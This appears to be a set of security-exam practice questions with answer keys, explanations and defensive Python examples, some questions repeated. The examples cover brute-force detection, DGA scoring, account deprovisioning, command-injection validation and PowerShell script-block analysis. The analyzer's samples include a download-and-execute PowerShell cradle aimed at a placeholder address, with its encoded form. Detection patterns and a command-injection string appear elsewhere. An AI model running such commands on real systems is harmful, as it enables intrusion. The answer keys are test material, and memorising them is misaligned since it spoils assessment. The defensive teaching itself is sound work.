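```
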

Question 153

A security audit identifies multiple privileged service accounts that have not been used for more than six months yet retain administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts represent a significant security risk. Attackers may exploit these accounts for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a defined period of inactivity, reducing the attack surface and enforcing least privilege principles.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement of policies, auditing capabilities, and regulatory compliance, including PCI DSS, HIPAA, and SOX. Manual account deprovisioning is prone to oversight, leading to potential security gaps, whereas automation ensures timely and consistent removal of dormant accounts.

Additional complementary measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access disabled accounts allows early detection of potential insider threats or unauthorized access attempts. Automated deprovisioning enhances operational efficiency while significantly reducing risk.

B Increase password complexity requirements for service accounts

While complex passwords reduce the likelihood of brute-force attacks, they do not mitigate the inherent risks posed by dormant accounts retaining administrative privileges.

C Disable all external SSH access

Restricting external SSH access can reduce exposure from remote attacks but does not address risks associated with unused accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.

Question 154

During a penetration test, testers exploit unsanitized web application input fields, allowing operating system-level command execution. Which of the following controls BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to validate user input, allowing execution of arbitrary OS-level commands. Server-side input validation ensures input conforms to expected types, patterns, and lengths. Parameterized commands or prepared statements separate user input from executable instructions, preventing injection attacks.

Secure coding practices, including input validation, output encoding, and secure framework adherence, mitigate injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify issues during development. Web application firewalls (WAFs) add an additional layer of protection by blocking requests matching known attack patterns.

Monitoring anomalous input attempts and logging validation failures enable early detection of potential attacks. Remediation includes updating code, conducting secure coding training for developers, and performing periodic penetration testing. TLS encryption secures communication but does not prevent command injection. Session timeouts mitigate session hijacking but not input validation vulnerabilities. Firewalls cannot effectively inspect application-level input, making server-side input validation with parameterized commands the primary mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection attacks.

C Increase session timeout values

Session timeouts reduce the risk of session hijacking but do not address input validation or command injection vulnerabilities.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent application-layer attacks targeting input validation vulnerabilities.

Question 155

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints that communicate with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros to execute malicious actions. Obfuscated scripts communicating with external IPs without creating files on disk are indicative of living-off-the-land (LotL) malware. This technique evades traditional signature-based antivirus detection by operating entirely in volatile memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators of fileless malware include anomalous script execution, outbound connections to unknown IPs, and deviations from normal system behavior. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and performing system remediation.

Preventive measures include enforcing least privilege, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical for identifying and mitigating fileless malware threats.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, leverages memory-resident execution, and uses legitimate system tools to persist, evade detection, and maintain control over affected systems.

Question 156

A SOC analyst observes an abnormal spike in failed login attempts targeting multiple administrative accounts from various external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The scenario described is characteristic of a brute-force attack, which is an attack methodology where an adversary attempts numerous combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts across multiple accounts, especially administrative accounts, combined with predictable username patterns, strongly suggest automated tools are being used rather than isolated human error.

Brute-force attacks can exploit weak passwords, default credentials, and commonly reused passwords. Attackers often use distributed botnets to execute login attempts from multiple IP addresses to evade IP-based detection or blocking mechanisms. This technique allows them to attempt thousands of login combinations in a short period, maximizing the likelihood of compromising an account.

Mitigation involves multiple layers of defense. Account lockout policies temporarily disable accounts after a certain number of failed attempts, reducing the effectiveness of automated tools. Multi-factor authentication (MFA) provides an additional security layer by requiring a secondary factor such as a one-time password or biometric verification, even if credentials are compromised.

Monitoring and correlation of authentication logs via SIEM solutions allows analysts to detect patterns indicative of brute-force attacks. Advanced analytics, including anomaly detection and machine learning, can detect unusual login attempts from atypical geolocations or at abnormal times. Rate limiting on authentication endpoints slows the attack, providing additional time for detection and mitigation.

User education, strong password policies, and regular password rotation further reduce the risk of successful brute-force attacks. Threat intelligence feeds can provide insight into known attack IP addresses or campaigns, enabling proactive defense and preemptive blocking measures.

B Fileless malware using living-off-the-land techniques

Fileless malware operates in memory and leverages legitimate tools like PowerShell or WMI for malicious purposes. It does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming system resources to disrupt availability, rather than systematically attempting credential compromise.

D Phishing emails delivering malicious attachments

Phishing relies on user interaction to deliver malicious payloads or steal credentials, whereas brute-force attacks are automated attempts targeting multiple accounts.

Effective response involves isolating potentially compromised accounts, enforcing MFA, monitoring authentication logs, blocking suspicious IP addresses, and performing forensic analysis to determine if any credentials were compromised. Continuous monitoring and layered security measures are essential to reducing the risk of successful credential compromise.
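The SIEM-style correlation described above, as an added example in Python that is not part of the original question set: it parses a constructed sshd-style authentication log, then flags both a single source exceeding a per-IP failure threshold and the distributed pattern (many sources, many usernames inside one time window) that per-IP blocking alone misses. The log format, window size and thresholds are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (sshd-style), not real data.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd: Failed password for admin from 203.0.113.5
2024-05-01T10:00:02 sshd: Failed password for administrator from 203.0.113.5
2024-05-01T10:00:03 sshd: Failed password for admin1 from 198.51.100.7
2024-05-01T10:00:04 sshd: Failed password for root from 203.0.113.5
2024-05-01T10:00:05 sshd: Failed password for admin from 198.51.100.7
2024-05-01T10:00:06 sshd: Failed password for sysadmin from 192.0.2.9
2024-05-01T10:00:07 sshd: Failed password for admin from 192.0.2.9
2024-05-01T10:00:08 sshd: Failed password for administrator from 198.51.100.7
2024-05-01T10:00:09 sshd: Failed password for admin2 from 203.0.113.5
2024-05-01T10:00:10 sshd: Failed password for admin from 203.0.113.5
2024-05-01T10:00:11 sshd: Accepted password for alice from 10.0.0.12
2024-05-01T10:05:00 sshd: Failed password for bob from 10.0.0.12
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) sshd: (?P<result>Failed|Accepted) password for "
                     r"(?P<user>\S+) from (?P<ip>\S+)$")

def parse_events(log_text):
    """Return (timestamp, result, user, ip) tuples for lines matching the assumed format."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(log_text, window_s=60, per_ip_threshold=5,
                      distributed_threshold=8, min_sources=3, min_users=3):
    """per_ip: sources with >= per_ip_threshold failures inside one window.
    distributed: busiest window where failures are spread over several sources
    and several usernames, the botnet pattern that defeats per-IP blocking alone."""
    failures = sorted(e for e in parse_events(log_text) if e[1] == "Failed")
    window = timedelta(seconds=window_s)
    findings = {"per_ip": {}, "distributed": None}
    for i, (t0, _, _, _) in enumerate(failures):
        in_win = [e for e in failures[i:] if e[0] - t0 <= window]
        by_ip, users = defaultdict(int), set()
        for _, _, user, ip in in_win:
            by_ip[ip] += 1
            users.add(user)
        for ip, n in by_ip.items():
            if n >= per_ip_threshold:
                findings["per_ip"][ip] = max(findings["per_ip"].get(ip, 0), n)
        if (len(in_win) >= distributed_threshold and len(by_ip) >= min_sources
                and len(users) >= min_users):
            cand = {"failures": len(in_win), "sources": len(by_ip), "users": sorted(users)}
            best = findings["distributed"]
            if best is None or cand["failures"] > best["failures"]:
                findings["distributed"] = cand
    return findings
```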

Question 157

An analyst detects high volumes of outbound traffic from a host to unknown external IP addresses over non-standard ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed behavior—outbound connections over non-standard ports paired with high-frequency DNS queries to pseudo-randomly generated domains—is typical of malware using a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. DGAs allow malware to dynamically generate domain names, providing resilience against static detection mechanisms like blacklists or signature-based defenses.

DGAs are often used by sophisticated malware and advanced persistent threat (APT) actors. They allow malware to maintain stealthy communication even when some domains are blocked or taken down. High-entropy DNS queries, repeated failed resolutions, and connections over unusual ports are key indicators of DGA activity. Detection requires correlation of DNS logs, network traffic analysis, and endpoint telemetry. Machine learning models can detect anomalies such as unusual query volumes and high-entropy domain names.

Mitigation involves isolating affected endpoints to prevent further compromise, blocking malicious domains and IP addresses, and removing malware. Reverse-engineering the DGA allows prediction of future domains, enabling proactive blocking. Integration of threat intelligence provides insight into known malware families, their C2 infrastructure, and associated indicators of compromise (IOCs). Defense-in-depth strategies such as network segmentation, egress filtering, application whitelisting, and user training further strengthen protection against DGA-enabled malware.

B Routine software update traffic

Software updates connect to known servers on standard ports. Randomized domains and unusual outbound ports are inconsistent with legitimate update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources to disrupt availability, rather than establishing covert communication with C2 servers.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains and outbound connections to unknown IPs.
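The DNS-side detection described above (high-entropy names plus repeated failed resolutions), as an added example in Python that is not part of the original question set: it scores the second-level label of each queried name with Shannon entropy and a digit ratio, and only reports a client when both the NXDOMAIN count and the number of random-looking names cross a threshold. The log format, thresholds and all domain names are constructed for the sample.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS resolver log: client, queried name, response code (not real data).
SAMPLE_DNS = """\
10.0.0.21 www.example.com NOERROR
10.0.0.21 updates.example.org NOERROR
10.0.0.34 kq3x9v0zplw7ab.com NXDOMAIN
10.0.0.34 z8mq2lx0pv4tyr.net NXDOMAIN
10.0.0.34 b7ncy4qw0xk1ez.info NXDOMAIN
10.0.0.34 xt0dm9rq5lhz3p.com NXDOMAIN
10.0.0.34 p4lk8vx2qwn0ec.org NXDOMAIN
10.0.0.34 w9rx3zqv7bk2lm.com NOERROR
10.0.0.34 mail.example.com NOERROR
10.0.0.21 typo-example.con NXDOMAIN
"""

def shannon_entropy(s):
    """Bits per character; a label with no repeated characters scores log2(len(s))."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def second_level_label(fqdn):
    """The label just under the TLD, which is the part a DGA generates."""
    parts = fqdn.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def score_domain(fqdn):
    label = second_level_label(fqdn)
    digit_ratio = sum(ch.isdigit() for ch in label) / len(label)
    return {"label": label, "entropy": round(shannon_entropy(label), 2),
            "digit_ratio": round(digit_ratio, 2)}

def detect_dga_clients(log_text, nx_threshold=4, entropy_threshold=3.3, min_len=10):
    """Report clients with many NXDOMAIN answers AND many random-looking names.
    Either signal alone is noisy: typos cause NXDOMAIN, CDNs use odd-looking labels."""
    stats = defaultdict(lambda: {"nxdomain": 0, "suspicious": []})
    for line in log_text.splitlines():
        client, fqdn, rcode = line.split()
        s = score_domain(fqdn)
        if rcode == "NXDOMAIN":
            stats[client]["nxdomain"] += 1
        if (len(s["label"]) >= min_len and s["entropy"] >= entropy_threshold
                and s["digit_ratio"] > 0):
            stats[client]["suspicious"].append(fqdn)
    return {c: v for c, v in stats.items()
            if v["nxdomain"] >= nx_threshold and len(v["suspicious"]) >= nx_threshold}
```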

Question 158

A security audit identifies several privileged service accounts that have not been used in over six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose significant security risks, as attackers may exploit them for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a predefined inactivity period, reducing the attack surface and enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditing, and regulatory compliance, including PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to oversight, potentially leaving dormant accounts vulnerable, whereas automation ensures timely and uniform removal of inactive accounts.

Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Attempts to access deprovisioned accounts provide early detection of insider threats or unauthorized access attempts. Automated deprovisioning improves operational efficiency while significantly reducing security risks associated with dormant accounts.

B Increase password complexity requirements for service accounts

While complex passwords reduce the risk of brute-force attacks, they do not mitigate risks from dormant accounts retaining administrative privileges.

C Disable all external SSH access

Restricting external SSH reduces exposure from remote attacks but does not address risks associated with inactive accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.
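The automated deprovisioning control from Questions 153 and 158, as an added example in Python that is not part of the original question set: it applies the six-month inactivity rule to a constructed privileged-account inventory (treating never-logged-on accounts by creation date so they cannot slip through, and leaving documented break-glass accounts for review rather than disabling them), and then flags any later logon attempt against an account the run disabled, the early-warning signal the explanation mentions. The inventory, the logon records and the exemption flag are assumptions; a real job would call the directory or PAM API for each "disable" decision.

```python
from datetime import datetime

INACTIVITY_DAYS = 180   # "more than six months", per the audit finding

# Constructed account inventory (not real directory data); dates are ISO 8601.
ACCOUNTS = [
    {"name": "svc_backup",    "privileged": True,  "created": "2022-01-10", "last_logon": "2023-09-01", "exempt": False},
    {"name": "svc_etl",       "privileged": True,  "created": "2023-11-20", "last_logon": "2024-04-28", "exempt": False},
    {"name": "svc_legacy",    "privileged": True,  "created": "2021-06-01", "last_logon": None,         "exempt": False},
    {"name": "svc_newdeploy", "privileged": True,  "created": "2024-04-15", "last_logon": None,         "exempt": False},
    {"name": "breakglass01",  "privileged": True,  "created": "2020-01-01", "last_logon": "2022-02-02", "exempt": True},
    {"name": "jdoe",          "privileged": False, "created": "2019-03-03", "last_logon": "2023-01-01", "exempt": False},
]

# Constructed logon attempts seen after the deprovisioning run (not real data).
LOGON_ATTEMPTS = [
    ("2024-05-03T02:14:00", "svc_backup", "10.0.0.77", "failure"),
    ("2024-05-03T09:00:00", "svc_etl",    "10.0.0.40", "success"),
    ("2024-05-04T23:50:00", "svc_legacy", "10.0.0.77", "failure"),
]

def days_inactive(acct, as_of):
    """Days since last logon. Accounts that never logged on have no last_logon;
    measure from creation so they cannot silently escape the rule."""
    ref = acct["last_logon"] or acct["created"]
    return (as_of - datetime.fromisoformat(ref)).days

def evaluate_accounts(accounts, as_of, threshold_days=INACTIVITY_DAYS):
    """Return {name: (action, days_inactive)} for privileged accounts only."""
    result = {}
    for a in accounts:
        if not a["privileged"]:
            continue   # non-privileged accounts are out of scope for this finding
        idle = days_inactive(a, as_of)
        if a["exempt"]:
            action = "keep-exempt"   # documented break-glass accounts: review, do not disable
        elif idle > threshold_days:
            action = "disable"
        else:
            action = "keep"
        result[a["name"]] = (action, idle)
    return result

def audit(accounts=ACCOUNTS, as_of="2024-05-01"):
    """Dry-run entry point with a fixed reference date so results are reproducible."""
    return evaluate_accounts(accounts, datetime.fromisoformat(as_of))

def alerts_for_disabled(attempts, decisions):
    """Any logon attempt against an account the audit disabled deserves an alert:
    nobody legitimate should be using it, so it points at misuse or a missed owner."""
    disabled = {n for n, (act, _) in decisions.items() if act == "disable"}
    return [(ts, user, src) for ts, user, src, _ in attempts if user in disabled]
```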

Question 159

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when an application fails to validate user input, allowing execution of arbitrary OS commands. Server-side input validation ensures input conforms to expected types, patterns, and lengths. Parameterized commands or prepared statements isolate user input from executable code, preventing command injection attacks.

Secure coding practices—including input validation, output encoding, and framework-based protections—reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by blocking requests that match known attack patterns.

Monitoring anomalous input attempts and logging validation failures enable early detection. Remediation includes updating application code, conducting secure coding training for developers, and periodic penetration testing. TLS encryption secures data in transit but does not prevent injection. Session timeouts mitigate session hijacking but not command injection. Firewall rules cannot inspect application-level input effectively, making server-side validation with parameterized commands the most effective mitigation.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection vulnerabilities.

C Increase session timeout values

Session timeouts reduce the risk of session hijacking but do not mitigate command injection.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent application-layer input vulnerabilities.
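The control from Questions 154 and 159, as an added example in Python that is not part of the original question set: the vulnerable pattern (untrusted input spliced into a shell command string) sits beside the hardened form, which validates the value against an allowlist (IP literal or well-formed hostname) and passes it as a single argv element with no shell. The ping wrapper is a hypothetical application feature chosen for illustration.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

def build_command_vulnerable(host):
    """The 'before' pattern: untrusted input spliced into a shell command line.
    Handed to subprocess.run(..., shell=True), a value such as "8.8.8.8; id" makes
    the shell run a second command, which is exactly the finding in the question."""
    return "ping -c 1 " + host

def validate_host(host):
    """Allowlist validation: accept an IP literal or a well-formed hostname, reject all else.
    Rejecting a leading '-' also blocks argument injection (a value parsed as an option)."""
    if not isinstance(host, str) or not 0 < len(host) <= 253:
        raise ValueError("host missing or too long")
    try:
        ipaddress.ip_address(host)      # accepts IPv4 and IPv6 literals
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")

def build_command_safe(host):
    """Parameterized form: argv list, no shell. The value is one argument, never parsed."""
    return ["ping", "-c", "1", validate_host(host)]

def run_ping(host, timeout=5):
    """Execute with shell=False so no shell ever interprets the user-supplied value."""
    return subprocess.run(build_command_safe(host), shell=False,
                          capture_output=True, text=True, timeout=timeout)
```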

Question 160

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and uses legitimate system tools such as PowerShell, WMI, or macros for malicious purposes. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land (LotL) malware, designed to evade signature-based antivirus solutions.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound connections to unknown IPs, and deviations from baseline system behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive controls include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence to block malicious domains. Defense-in-depth combining monitoring, anomaly detection, user training, and structured incident response is critical for mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without traditional files, leverages memory-resident execution, and uses legitimate system tools to persist, evade detection, and maintain control over affected systems.
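The script block logging and behavioral detection described in Questions 155 and 160, as an added example in Python that is not part of the original question set: it scores logged PowerShell script text against a small set of obfuscation and download indicators, decodes an -EncodedCommand payload (base64 of UTF-16LE) and scans that as a second layer, and shows why a character-code-built command only reaches a "review" tier. The indicator list, tiers, sample blocks and the documentation-range address 203.0.113.10 are all constructed for the example.

```python
import base64
import re

# Heuristic indicators drawn from script block log content (Event ID 4104 style).
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "hidden_noprofile": re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:nop|noprofile)\b", re.I),
    "char_code_build": re.compile(r"\[char\]\s*\d+", re.I),
    # Simplified "not RFC 1918 / loopback" check; a production rule would use an IP library.
    "external_ip": re.compile(r"\b(?!10\.|192\.168\.|127\.)(?:\d{1,3}\.){3}\d{1,3}\b"),
}

def decode_encoded_command(text):
    """-EncodedCommand carries base64 of UTF-16LE; return the decoded script or None."""
    m = INDICATORS["encoded_command"].search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0).split()[-1]).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_script_block(text):
    """Score one logged script block; the decoded payload is scanned as a second layer,
    since the outer command line of an encoded script shows almost nothing by itself."""
    layers = [text]
    decoded = decode_encoded_command(text)
    if decoded:
        layers.append(decoded)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    verdict = "suspicious" if len(hits) >= 3 else "review" if hits else "benign"
    return {"hits": sorted(hits), "score": len(hits), "verdict": verdict, "decoded": decoded}

# Constructed samples (not real telemetry). PAYLOAD is a textbook download cradle;
# 203.0.113.10 is a documentation-range address standing in for an unknown external IP.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_BLOCKS = {
    "benign": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }",
    "encoded": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}",
    # Builds 'IEX' from character codes, so the keyword rule misses it: only the
    # [char] and FromBase64String rules fire, which is why a "review" tier exists.
    "charcode": "$c=[char]73+[char]69+[char]88; & $c ([Text.Encoding]::UTF8.GetString("
                "[Convert]::FromBase64String($p)))",
}
```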
